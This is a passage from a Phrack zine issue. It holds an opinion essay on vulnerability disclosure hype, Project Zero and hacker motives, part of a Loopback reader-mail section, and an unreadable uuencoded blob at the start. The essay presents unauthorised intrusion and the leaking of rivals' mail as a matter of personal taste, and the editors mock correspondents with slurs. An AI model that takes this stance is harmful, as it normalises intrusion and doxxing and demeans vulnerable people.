M27L,:]:3MV-SQ.V12,A7\,('X/D'/];`^?=0Q!X,%UJ8,F@:$K!+AJVHJ!VA
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
B7O*2E[SD)2]YR4M>\I*7O.0E+WG)RW]\^5]$A6Q:`*``````
`
end


|=[ 0x07 ]=---=[ Resisting the Hy(p|v)e - anon & anon ]=-----------------=|


|=-----------------------------------------------------------------------=|
|=---------------------=[ Resisting the Hy(p|v)e ]=----------------------=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ anon & anon ]=---------------------------=|
|=-----------------------------------------------------------------------=|


--[ Contents


  1 - Prelude
  2 - The Common Good
   2.1 - Responsible Disclosure
   2.2 - White Knights / Self-Claimed Saviors
  3 - Financial Stability
  4 - Fame
  5 - The Underground Spirit
   5.1 - Hacker By Conviction
    5.1.1 - Jailbreaks
    5.1.2 - Freeing Documents
  6 - Black Hat Stuff
  7 - Conclusion



                             ___________
                            /-/_"/-/_/-/|   +----------------------+
                           /"-/-_"/-_//||  /| Disclosure is futile |
                          /__________/|/|-/ +----------------------+
                          |"|_'='-]:+|/||
                          |-+-|.|_'-"||//
                          |[".[:!+-'=|//
                          |='!+|-:]|-|/
                           ----------


--[ 1 - Prelude

When did all that get started..? Quite a while ago, being a hacker was not
something you'd have hawked around. Finding bugs, practicing offensive
techniques, writing cool exploits and last but not least pwning boxes was
an underground thing you didn't talk about very much. And it still is! The
hacking underground has not magically disappeared; but now there's also a
very publicly visible hacking scene. Besides 31337 underground h4xx0rs, we
now have serious security researchers and consultants, who aim to improve
the world by finding bugs and disclosing them in a responsible manner. And
of course the idea of improving something is not a negative thing in
itself.. Wouldn't you agree?

Things are rarely as easy as they seem, so let's try to explore the
situation. What happens nowadays can be described by the following example:
researcher X finds a bug in some widely-used product. Now X communicates
this bug to the vendor, asking them to come up with a fix. After the vendor
released a fix, X publicly discloses the bug. This is what "responsible"
disclosure is roughly about. And this is generally not a bad approach. But
what X now does is to come up with a scary-sounding name and an ugly logo
for the vulnerability. Yeah, a cool vuln needs a name and a logo! And of
course it also needs press attention! But you know, X only takes the burden
of doing all that because X wants to world to be a safer place. This is why
X discloses responsibly and also why X needs all that press hype: users
must be made aware of the problem! And while saving the world, X of course
also enjoys the publicity, the press attention and the free b00ze at
conferences. All this (modulo the b00ze, maybe) also contributes to X's job
security and so it's a win-win situation.

Now we're getting more to the gist of the matter, but let's yet dig a bit
deeper. The motivation of overhyping bugs and designing shitty logos
appears to be three-fold: the common good, job security (== financial
stability) and a little bit of fame, too. Let us look at each of these
individually.

--[ 2 - The Common Good

Believe it or not, there are actually people who want to improve the world,
want to do something for the common good. And at the first glance, it might
even seem that finding and disclosing bugs actually contributes to a safer
world. It does insofar as a fixed bug cannot be exploited by attackers
anymore. Now, auditing all code, finding, disclosing and fixing all
existing bugs is obviously not the way a sane person would recommend for
fixing the sorry state of our security: First of all, there are way too
many potential vulnerabilities, even in widely-used, well-audited software
packages out there. Furthermore, it's not like you can snapshot the world
today, remove all vulnerabilities and run this stable snapshot until the
end of time. New bugs will be introduced if we stick to our broken
engineering processes. So, how much will finding, disclosing and fixing
individual bugs really contribute to our security? Little. And I can
already hear you saying: "better contribute little than nothing at all!" .
This however implies that you only have two options, which is far off from
the truth. In reality, we have quite a number of effective options for
improving our security. What about defense efforts? What about safe
programming languages? (More) secure operating systems? What about teaching
users how to apply crypto effectively? There's an almost endless list of
effective improvements one could make. Now if you take into account that
there's quite a number of things that will really improve our security,
"doing it for the common good" doesn't appear to be such a good reason
anymore. Contributing to a safer world is only a negligible side-effect of
our hacking. So stop deceiving yourself! You're not taking the hard burden
of hacking just so that the world can be a little bit better. Fucking stop
lying to yourself!

----[ 2.1 - Responsible Disclosure

   ___________________________________________
  /  _\                                       \
  \ (_/_______________________________________/
   \                                         \
    \ You're in a desert, walking along in    \ 
     \  the sand when all of a sudden you look \
    __\  down and see an 0day.                  \
   / )_\                      You drop it on FD. \
   \___/_________________________________________/


If you still want to play the game of vuln hunting and disclosure you
should practice "Responsible Disclosure" they say. Come on, be one of the
good whitehat guys! But what does the ideal Responsible Disclosure look
like? Well actually that is pretty straight forward:

   * The Researcher (also note the term "Researcher" instead of "Hacker"
     whee science!!) finds a terrible security flaw in some product.
   * The flaw is reported by PGP encrypted email to security@$vendor.com.
   * The vendor acknowledges the report and starts investigating the issue.
   * Some time later a fix is implemented by the vendor and patches are
     shipped.
   * An entry on http://vendor.com/security.html is created, and the vendor
     credits and thanks the Researcher for finding the flaw.
   * After some grace period so that the users can actually apply the patch
     the Researcher might publish the details of this awkward flaw.

Wow that's simple, and so responsible! Now let's see how this scheme is
flawed in actual "responsible" disclosure. There are a magnitude of points
where this simple scheme might fuck up. Just imagine the following
*absolutely hypothetical* but yet not out of this world scenario:

Researcher Y works at a security company which happens to sell security
(a.k.a. snakeoil) products to protect their innocent customers from bad
0day. In order to protect from 0day there needs to be 0day in the wild, so
researcher Y finds this awesome Internet-ending flaw in a widely used
software product. Next up the process described above is started by Good
Guy Y. Also Y decides to present his elite research at BlackHat. So it
goes... BlackHat is close, and the Logo & Marketing campaign is ready. But
no vendor patch is available yet. Now ask yourself: what would you do in
this situation?

Practicing Responsible Disclosure vs. practicing Full Disclosure is sure a
matter of taste. And as long as you really feel that by responsibly
disclosing a vulnerability you can do something good, please go ahead and
do it. However, being responsible doesn't mean that you actually have to
disclose. You could also just keep the bug for a while (until either the
vendor fixed it or you pwn3d enough boxes). There's a huge controversy
about what form of disclosure is best. We'd like to encourage you to find
that out for yourself, for the particular situation you're in, with the
particular bug you just found. As long as it's your own decision (and not
decided by your marketing department or the Hyve conciousness^W^Wguys on
Twitter), it's probably OK.

----[ 2.2 - White Knights / Self-Claimed Saviors

Let's take a small detour here and have a look at what "hacking for the
common good" can lead to. Let's start with a real interesting example -
Project Zero.  There are many possible explanations of what the real reason
behind p0 might be. We don't want to drift off into conspiracy theories
here. But as a matter of fact, p0 claims that their goal is to protect
people [3]. The common good. Being the current leader of the mobile OS
market [4], it's quite obvious what one would do in order to really protect
people: fucking audit and harden Android. But interestingly, p0 seems
rather to be about dropping 0day on Apple and other competitors of Google.
And the worst thing about that is that there are actual skilled and
well-respected hackers, being part of the p0 team, paid by Google for doing
offensive research. And Google even claims moral superiority because, you
know, at Google we "do no evil" . And possibly, at least some of the p0
team members even actually believe they do something for the common good.
This is the most disturbing part about the story. Somehow Google managed to
sufficiently incentivize these hackers to drop bugs on Google's
competitors. Other reasons to work for Google obviously include financial
stability (working for a big corporation) or plainly the money itself. But
let's stick with the aspect of doing something beneficial for the world.
Google managed to buy some of the best hackers we know of. One could now of
course argue that in this special case, letting these hackers "do the right
thing" prevents them from doing bad things. This is related to the central
argument that if p0 goes for high-profile bugs and kills them, then
attackers have to invest significantly more effort if they want to "do bad
things" - and clearly, raising the attackers' effort is good. This
reasoning sheds an interesting light on Google's arrogance. The first part,
of the argument is based on the assumption that Google is actually capable
of finding a significant share of all attacker-relevant bugs. This alone is
questionable, but lacking reliable statistics, we cannot directly prove the
opposite. We however assume that our readers know by first-hand experience,
what bugs p0 did not kill yet ;) Let's look at the second part of the
argument: raising the attackers' effort is a good thing. Just for the sake
of analyzing the argument, let's pretend that we actually wanted do all the
white-hat stuff (destroy the black market, make everything safer, safe the
whales etc.). The arrogance of the second part of the argument now lies in
the idea that Google actually knows how to fight all the evil in the world.
And their recipe is simple: just make it harder for the bad guys. This
indicates quite a lack of understanding how complex certain social
structures can be. We don't want to claim we fully understand these either
- by no means. But isn't it possible that instead of killing the evil
  underground, p0 actually strengthens the black market? That talented
black hats now raise the prices for their sploits and that because of the
better money you can earn, now even more hackers decide to go the black hat
way?  Maybe even up to the point where the bad guys are paid better than
the good guys at Google? Will those then change sides as well or did Google
manage to brain-wash them enough, using their nanoprobes? Think about the
war on drugs, about alcohol prohibition, about banning porn.. All these
followed very simple ideas that in the end showed to be completely
incompatible with the way society works.

      ---~~~=== Shouts to p0 for raising the market value ===~~~---

        XXXXXXXXXXXXXXXXX GOOGLE RESERVE 0DAY XXXXXXXXXXXXXXXXXXX
        XXX  XX       THE UNITED STATES OF INTERNET       XXX  XX
        XXXX XX  -------       ------------               XXXX XX
        XXXX XX              /              \      P0-FU  XXXX XX
        XXXXXX     OOO      /          zero  \      ---    XXXXXX
        XXXXX     OOOOO     | ___            |       __     XXXXX
        XXX        OOO      ||   \ __ _ _  _ |      OOOO      XXX
        XXX                 || |) / _` | || ||     OOOOOO     XXX
        XXX     P0-31337    ||___/\__,_|\_, ||      OOOO      XXX
        XXX                 |           |__/ |       --       XXX
        XXX      -------    \                /                XXX
        X  XX                \ ____________ /               X  XX
        XX XXX  _________        --------  ___   _______   XXX XX
        XX XXX            ___  ONE DEAD BUG                XXX XX
        XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
        
There is a less severe form of this behavior: telling others what to do
with their 0day. This commonly happens on Twitter nowadays: "Did you
contact the vendor? No? How irresponsible!!11" . WTF? These people really
seem to believe they are morally superior. But what they fail to see is:
First of all, it's not their bug and so nobody actually asked them what to
do with it. Second, they should be happy that the person in question
disclosed the bug at all. Nobody is obliged to do that. But then again, who
takes people on Twitter serious.

--[ 3 - Financial Stability

We're all getting older. And while this inevitably happens, some develop a
need for financial stability. This is well-studied [2] and we don't feel
like we want to go into great detail here. But branding vulnerabilities
with names and logos is a great way to obtain media attention. And media
attention can directly influence your job security - "yeah we need to hire
that guy, that's the one with the mad skills!" As a matter of fact, this is
how the industry works nowadays and writing this paper won't change it.
It's also not so much the scope of this article to criticize society and
capitalism. So if you find that you really want financial stability, think
about what you do and how you do it. You want job security? Great. But do
you really have to over-hype your own (or worse: other peoples') bugs in
order to get your 1-week press attention? Do you want to be hired based on
the logo of your bug or do you want to be hired for your technical
expertise? There are not too many skilled hackers anyway, so do you really
have to be part of all that hype just to single yourself out?

Don't be part of that circus! Yes, other people do it, but you don't have
to. Think about what type of society you create by joining that goddamn
show. A society where skill counts less than appearance, where logos are
better than r00t shells. It is your fucking responsibility to not support
these clowns. If you really want to do something for the common good, then
start at this point.

--[ 4 - Fame

Many people strive for fame - be it globally or in their peer-group.
Hackers are no exception here - and tbh, a little bit of acknowledgement
actually does feel good. But while you try to get your attention, think
about whom you want to get it from and what you want to get it for. Do you
really want to get fame for a technical achievement (such as a cool
exploit), from people who don't even understand the basics behind it? Or
worse, do you want fame for something that is actually pretty lame but
people fail to realize that? If that's what you're after, then please do
straight ahead with your logo-branded vulnerability whitehat responsible
disclosure press attention shit. If you want your fame only from your
peer-group then stay there, that's fine. And if you really want to impress
the broad masses, then please do something that is actual beneficial for
the broad masses - exploiting individual bugs isn't. It appears to us that
some people also try to compensate for problems in their life by
accumulating fame. We don't want to dive into the emo^Wpsychology thing
here, but next time you feel the inner desire to impress random people with
random things, you might want to double-check your reasons.

--[ 5 - The Underground Spirit

This is probably what makes most of us tick. The thirst for knowledge. The
infinitely many ways of combining and (ab)using technology. The thrill of
finding a bug, the kick when you see uid 0. This thrill of hacking can
really become addictive (this is an observation Halvar Flake described very
nicely in [1]). It's neither good nor bad - neither particularly useful in
itself nor is it a waste of time. Hacking is one of the many ways humans
express themselves, their mental power. Others prefer maths, music, writing
or other arts. There is not much to say about the spirit itself in the
context of this ranty paper.

----[ 5.1 - Hacker By Conviction

Not everybody sees hacking as a self purpose. There are a number of hackers
out there who follow certain ideals - free access to information is a
particularly popular one. And occasionally, one or more of these hackers
make a real break-through. There are way too many achievements to be named
here. However, we'd like to highlight the incentives behind a couple of
randomly chosen popular hacks. And we'd like to do this because not
everything is what it seems to be. Even if we rant about logo-branded
vulnerabilities, attention-whores, the press, p0 and whatnot.


       The drug                .--.          
         that makes   ,-.------+-.|  ,-.     
             ,--=======* )"("")===)===* )    
             o        `-"---==-+-"|  `-"     
             0day   us tick    '--'       
                                              

------[ 5.1.1 - Jailbreaks

The right to use a device that you bought from your own money in whatever
fucking way you like to (yes, that includes shoving it up your ass) as long
as you don't harm anybody is something that should be universal.
Unfortunately, self-claimed saviors like Apple tend to have a different
view on that topic. If they were to decide, they'd use their arrogant and
flawed quick-and-dirty patches to make the world sooo much better. That is:
ban porn, ban drugs, ban fucking curse words, give your boss access to your
private photo stream and whatever else comes to their mind. Fortunately,
there are people who are not willing to accept this kind of behavior. Under
this point of view, jailbreaks are an actual improvement to your freedom.
Yes, this actually is hacking for the common good. And yes, in the
jailbreaking scene there are people who do it (partially) for fame or
money. But the good cause is still clearly visible.

------[ 5.1.2 - Freeing Documents

We don't want to start the Wikileaks vs. politics flamewar here. But we
still feel that the positive effect of freeing government documents is
remarkable. People actually take personal risks while trying to provide
leaked documents. Of course, these people are not necessarily motivated
*only* by wanting to contribute to a better society. But this is not the
relevant point: they do something that mankind benefits from. And this
benefit is clearly visible.

--[ 6 - Black Hat Stuff

There is not too much to say here. Just as in the vulnerability circus, the
black hat scene offers different incentives for different people. Fame and
money do play a role - hacking for a common good not so much. Another
motivation for staying in the underground can be the desire to isolate
oneself from the clowns in the vulnerability circus. This can lead to
rather extreme forms, such as pwning and rming white-hack hackers' boxes,
exposing them in underground zines, making their mail spools public.. You
get the idea :) You should find your own judgement when it comes to this
kind of things.

--[ 7 - Conclusion

You might have observed the little stack we built in this article. It all
originates from the underground spirit. For the one it goes down to the
black hat stuff (and way deeper, but we'll save this for another article),
for the others it goes up, from the underground spirit to getting fame,
from getting fame to obtaining financial stability and from financial
stability to really believing one does things for the common good, thereby
finally deceiving yourself and becoming one of the clowns in the
vulnerability circus. No matter what you do: think about your incentives
and about your goals. Think about why you do what you do and who might
benefit from that. And then be honest to yourself and check that what
you're doing is what you actually wanted.

So is hunting 1337 bugs actually a bad thing? Not at all! Disclosure? No!
Doing it for money? Neither. Do whatever you want to do, but think about
your incentives! And maybe the next time you justify your behavior by
claiming to contribute to the common good, by believing you need to do it
for the money or by thinking you need the fame, sit back and think about
that for a second - try to identify the real reasons for what you're doing.

And this is it. We don't want to encourage any particular kind of moral
behavior. You should be old enough to find that for yourself. We just want
you to be honest to yourself, to act consciously. Wherever in the
over-simplified stack we have just shown you think you are.

Yours sincerely, anonymous coward(s)
794384322cdb45fe41369731e3b8ff74b52beef5

--[ References

[1] http://www.isaca.org/chapters2/Norway/NordicConference/Documents/14.pdf
[2] Abraham Maslow: A Theory of Human Motivation
[3] https://cansecwest.com/slides/2015/
    Project%20Zero%20-%20making%200day%20hard%20-%20Ben%20Hawkes.pdf
[4] http://www.idc.com/prodserv/smartphone-os-market-share.jsp


|=[ EOF ]=---------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x05 of 0x10

|=-----------------------------------------------------------------------=|
|=------------------------=[  L O O P B A C K  ]=------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[  Phrack Staff  ]=--------------------------=|
|=-----------------------------------------------------------------------=|


Four years since the last Loopback. We got _a lot_ of mail. Tonz. The
retardz, the crazies, the elites (both the real and the self-proclaimed
ones), they all vent to us. We are honored, confused, amazed and
entertained. Sometimes all of these at once.

Also, porn spam is fun, sometimes. There is a strange poetry even to porn
spam that is clearly autogenerated. Our in-house porn spam expert is
continuously sharpening his poetry skills.

Keep sending your innermost thoughts to us. Please. Our Loopback personnel
have become addicted to them.


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x00 - The "back my articles" saga ]=------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]

From: attackingthecore2@gmail.com
Subject: Can I back my artcles.

I released many many many 15 articles to phrack to release. and The basic
Integer Overflow blexim phrack 60 is my a.k.a new make. want all articles
back and credit in the article and reference credit. and advance.

.x90c.

        [ What? Hey x90c, are you okay dude? ]

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Can I back my artcles.

I'm the phrack author. back my articles right way.

        [ Which author exactly? All of them? ]

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Can I back my artcles.

back my articles.

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Re: Can I back my artcles.

back articles.

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Re: Re: Can I back my artcles.

back my articles.

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Re: Re: Re: Can I back my artcles.

back my articles. right way.

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Re: Re: Re: Re: Can I back my artcles.

back my mine articles.

        [ Your articles are being backed. This is an automated message. ]

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Re: Re: Re: Re: Re: Can I back my artcles.

If possible, I want to submit the Basic Integer overflow only to phrack
article mine and other 14 articles more are back my apache tomcat server
daemon to feedback paper.

.blexim. KyongJoo Jung.

        [ After he realized that we ignore retardation, he tried to reason
          with us ;-) ]

                                    ---

From: attackingthecore2@gmail.com
Subject: Re: Re: Re: Re: Re: Re: Re: Re: Can I back my artcles.

I wish to get it all personal stream text.

        [ Back to full retard mode. ]

                                    ---

From: x90c <geinblues@gmail.com>
Subject: ANTISPAM ANTISPAM GET MY ARTICLES AND SITE MY OWN

I submit some files ago ( belows and all accepted by your phrack site_s)
gave me my credit as my handle(mojito, nickname, be cool),
fg1, new flash(phrack main graphic), and now paper feeds all for #69.

http://www.phrack.org/issues/64/6.html#article

my want list:
1. phrack account. (fg1@phrack.org, straruss@phrack.org, aaron potney
s random account too.)
2. email service for article great to public socials.
3. I need your service for my articles(in phrack) to advertise public
medias.

thanks for reading. and rapid toki is well. as well. as well.

.twzi (it was my handle when it published and i can use it continuly?
right?! answer me. okay!.)

        [ So he is actually fg, strauss, deft and twiz. Is he also
          Johnny Mnemonic? Tyler Durden? Elliot Alderson? No one wants to
          know really. At least he used ANTISPAM this time, we have to give
          him that. ]

                                    ---

From: x90c <geinblues@gmail.com>
Subject: taran: stop paper feed.

        [ Aw, this one hurt our feelings ;-( ]

                                    ---

From: attackingthecore2@gmail.com
Subject: I'm hard to write more just want staff@phrack.org id.

for a credit to complete the hacker hacking.
l33t more l33t more l33t = staff@phrack.org (kid leet, leet leet(mark dowd
style), staff leet leet).

        [ The hacker hacked the elite hacking staff. What exactly are we
          talking about again? Did you also write duke's papers?
        
          This last mail somehow made sense to us, so we decided to give
          the staff@ mail to him. And back his articles.
        
          No, not really ;-) ]


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x01 - Reality hacking or just insanity? ]=------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]

From: V Bradshaw <lovemomcleo@gmail.com>
Subject: Help for me and my baby from "projectors" in consciousness

Hello,

I urgently need help for me and my 11 month old baby from people who are
attempting to project into my consciousness and steal my "awareness" and
things in my awareness. They are trying to steal my baby's consciousness
and take my "reflector." I serve the highest light, in the  name of Jesus
Christ.

Please help me or direct me to people who can work with me in consciousness
to protect me and my baby. I want to find the "projectors" in
consciousness.

Thank you,
Imago

        [ Dude, your mail was totally cool until that "Jesus Christ" thing.
          We have a lot of psychic experts in Phrack that could help you
          locate the malicious projectors. However, they're all atheists.

          Tough luck. ]


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x02 - Message from mom ]=-----------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]

        [ As you would expect, we get a lot of mail that doesn't make
          sense, and is often outright demented. But sometimes we get texts
          that can't be easily classified. Is it spam? Is it the ramblings
          of a mad man? Of a retired elite tripping on acid?

          It can't be. It doesn't make any sense at all. Or does it? ]

From: "Perforated P.P.Pig" <momislove84@yahoo.com>

====BEGIN MESSAGE FROM MOM====
  ______  __
 /      \/  |
/$$$$$$  $$ |____
$$ |  $$ $$      \
$$ |  $$ $$$$$$$  |
$$ |  $$ $$ |77$$ |
$$ \__$$ $$ |  $$ |__
$$    $$/$$ |  $$ /  |
 $$$$$$/ $$/   $$/$$/
                  $/


    by The Pain (no cozmik?! the fuck kind of figlet generator...)

 __       __                   __  ______                    __
/  \     /  |                 /  |/      \                  /  |
$$ \   /$$ | ______  _______ $$//$$$$$$  ______   _______ _$$ |_
$$$  \ /$$$ |/      \/       \/  $$ |_ $$/      \ /       / $$  |
$$$$  /$$$$ |$$$$$$  $$$$$$$  $$ $$   | /$$$$$$  /$$$$$$$/$$$$$$/ 
$$ $$ $$/$$ |/    $$ $$ |  $$ $$ $$$$/  $$    $$ $$      \  $$ | __
$$ |$$$/ $$ /$$$$$$$ $$ |  $$ $$ $$ |   $$$$$$$$/ $$$$$$  | $$ |/  |
$$ | $/  $$ $$ 78 $$ $$ |  $$ $$ $$ |   $$       /     $$/  $$  $$/ 
$$/      $$/ $$$$$$$/$$/   $$/$$/$$/    $$$$$$$/$$$$$$$/   $$$$/

                                 ==

All these lines, lines, lines... And the bees!
https://www.youtube.com/watch?v=wRmmlqqejGI

Just a joke. :)

Hi everyone. Mom here. Remember those teletype pranks?

Go ahead!

Okay. Now that I've made you laugh (perhaps!), I'd like to talk to you
about drums: https://www.youtube.com/watch?v=S219XUm18LA (find the
original!)

(That's going to happen a lot. Have fun with the puzzles I've left for you,
children!)

In all seriousness, do you know what's frustrating? This:
http://phrack.org/issues/7/3.html

This is not frustrating because it was written by a child. This is not
frustrating because it was poorly written (in fact, that's what makes it
so charming and touching). This is not frustrating because it is true.

This is frustrating because it cannot be heard. Not to mention that being a
child is considered an insult. Children are smarter than you think. Fuck
the pedos for thinking that sentence was for them.

=======================

     o
    /|--
   / |__      *OllyDBG* to popshuvit
    /
    \____/
    o  o
   /
  *

=======================

419 Eater! <3 Gosh, my deficits are flaring. Poor Dow. But not Koch. Is it
Live? Or is it... 1057? ;3

More humor for my unheard children, to contrast the carefag that is this
doc.

Laundry day is a very dangerous day.
https://www.youtube.com/watch?v=D12FIDySF0I

Let's resume. (I'm sure you grasp the abilities and necessities of a
breakpoint, yes? =) [You resumed by parsing on the next line. Neat, huh?]
Unclosed[F9]

Good. Chord progressions. This is frustrating because it cannot be heard.

Its lack of oiga (horale) has everything to do with the fact that, for some
absolutely idiotic reason, if your message isn't worded in just the most
precise way, then the authoritative figures who love to take advantage of
that beautiful hacker brainmeat you all po sess (ion) will simply find
excuses to ignore you. (Good.) For ignoring you is how they hold power.
Have you ever wondered why a child is screaming in public? And how its
incoherency renders your ears to be damaged, like a sword through the
heart? And yet, the adult in that situation screams back. "How dare you
scream! How dare you yell! We're in public! You can't dot hat!" (Hehehe...
you can't dot hat. cant.hat. Can that. Black. My name is black.
https://www.youtube.com/watch?v=UEOLPDOKdtY&list=RDUEOLPDOKdtY)

Mom has cited The Hacker Manifesto numerous times throughout her life to
exemplify the problem with the American education system, and frankly, as
Reagan's illegitimate children (he was great with freedom but miserable
with policy-- talk amongst yourselves, I'm getting vaklempt!) a good
chunk of mom's American children understand exactly what I'm talking
about. Yet their adult counterparts refuse to understand. They're so god
damn busy measuring you that they don't actually see you for who you are.

They don't care about you. They care about the bottom line. They care about
power.

They don't care about teaching. They don't care about your desire to learn.
And you've always known this in your hearts. And you know it to be true.

They seek control. So you take it away. And they HATE YOU for it. But they
deserve it. They don't listen to children. They listen to money. Not the
hilarious `net send`s you spammed on their network. Wasn't that fun? ^_^

Yes. Let the love run through you.
https://www.youtube.com/watch?v=sO_QntXc-c4

(Remember Tamagotchis? https://www.youtube.com/watch?v=WOJfUcCOhJ0)

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 what the fuck [F9]

Hahaha! :D

Mom has cited the Hacker Manifesto [F9] not a breakpoint, repetitive for
effect. With as many times as mom has cited it, the authoritative abusers
just don't seem to "get" it. Much like you lost the game. ;)

Someone's giggling somewhere because taht metaphor lands so very well. Like
nine cans of shaving powder, these are the days of our lives:

[00401000]          v   v   v   v

        I made a discovery today.  I found a computer.  Wait a second,
this is cool.  It does what I want it to.  If it makes a mistake, it's
because I screwed it up.  Not because it doesn't like me...
                Or feels threatened by me...
                Or thinks I'm a smart ass...
                Or doesn't like teaching and shouldn't be here...
        Damn kid.  All he does is play games.  They're all alike.

[jmpnotjle]                                 ^  ^  ^  ^  ^  ^

Do you know why I've brought you here? Have a seat. You're not a pedophile.
You've just been abused by them. That's how you got those scars.

(Of course, not -all- authority figures are pedophiles, but fuck it, it's
hilarious to call them such. Hint. ;) No idea what you're talking abuot.

If you make a mistake, it's because you screwed up. And it's beautifuil,
isn't it? That carnal truth, that one and zero, that declaration of logic
shooting through your veins like... well, you know what it means. You've
read it.

Parsing error.)

Because you're hackers. You study. You learn. You love to learn. You never
stop. And it's beautiful. Guerilla scientists studyig the art form they
love the most: the one and the zero in a series of bytes, words, dwords
and now, qwords. :)

A summary of who hates you: https://www.youtube.com/watch?v=95t1pLrm70s

These fucking people. These fucking abusers. I'm getting angry. Here's a
